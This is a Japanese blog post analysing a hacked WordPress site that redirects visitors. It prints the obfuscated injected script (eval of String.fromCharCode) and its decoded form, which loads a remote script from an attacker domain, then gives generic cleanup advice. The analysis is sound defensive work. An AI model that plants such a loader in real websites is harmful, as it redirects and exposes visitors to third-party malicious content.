昨日、コミュニティで、あるサイト管理者がWordPress
で構築したサイトを開くと自動的に他人のサイトにリダイレクトされるのはどういう状況かと質問しているのを見ました。その後、Naibaは彼が個別チャットで送ったURLにアクセスして確認しました。
WordPressが悪意のあるリダイレクトコードに感染
自分のサイトを開くと、サイトのコンテンツが大半読み込まれた後、自動的に第三者のサイトにリダイレクトされ、さらに複数のサイトへ連続してリダイレクトされます。 同時に、リダイレクト先のサイトは通知権限の許可を要求してきます。下図の通りです:
その後、サイトのソースコードを分析しました(多くのプラグインがインストールされていたため、多くのjsなどのコードがあり、非常に乱雑でした)。最終的に、以下のコードが不自然であることに気づき、サイト管理者に確認したところ、彼自身のものでも、彼がインストールしたプラグインのものでもないことがわかりました。
<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>
その後、Naibaはこの「eval(String.fromCharCode」を検索し、以下の記録記事を見つけました。
記録 - サイトがハックされました!
その後、
jdstiles.comこのサイトで上記のコードの意味を解析しました。
var d=document;var s=d.createElement('script');
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}上記の数字をもう一度解析すると、以下のサイトが現れました。
https://blackawardago.com
最終的に現れるURLが何であれ、これがサイトのハッキングであることは明らかです。 海外ではこれをWordPress悪意のあるリダイレクトコードと呼び、2018年頃から流行し始めたようです。以下は、Naibaが資料を検索した際に見つけた2つの記事です。
https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-netもしあなたのサイトもこの悪意のあるリダイレクトコードに感染しているかどうかを知りたい場合は、以下のサイトでチェックできます。
https://sitecheck.sucuri.net/WordPress悪意リダイレクトコードの削除方法
もちろん、WordPressの悪意リダイレクトコードに感染した場合、どのように削除すればよいでしょうか?(そのサイト管理者が私に処理を依頼しなかったため、Naibaは実際のコードに触れることができませんでした。以下は一般的な対処法の共有です)
コードが理解できる場合の解決方法- 悪意のあるコードを見つけ、削除する。
- ウェブサイトのすべてのファイルとコードを調査し、感染しているものや不明なスクリプトがないか確認し、削除する。
- データベースが感染していないか確認し、もし感染していたら、感染したコンテンツを削除する。
コードが理解できない場合の解決方法- コードが理解できる人にお金を払ってクリーンアップを依頼する。上記の海外の例では108ドル/年からでした。
- ウェブサイトを削除して再インストールし、安全なThemeとPluginを使用していることを確認し、データベースが感染していないことを確認し、サーバーのセキュリティを確保する。
この記事をご覧の専門家で、この種の悪意コードのクリーンアップ方法をご存知の方、または悪意コードのクリーンアップ経験がある方は、ぜひコメントでご教示ください。
最後に、おすすめのPluginを紹介します:
WordPressにファイアウォールを導入しましょう!Wordfenceを試してみてください関連知識:
セキュリティ対策を実施し、WordPressサイトのハッキングを防ぐ
コメントは終了しました
この記事のコメント機能は終了しています。ご質問がある場合は、他の方法でお問い合わせください。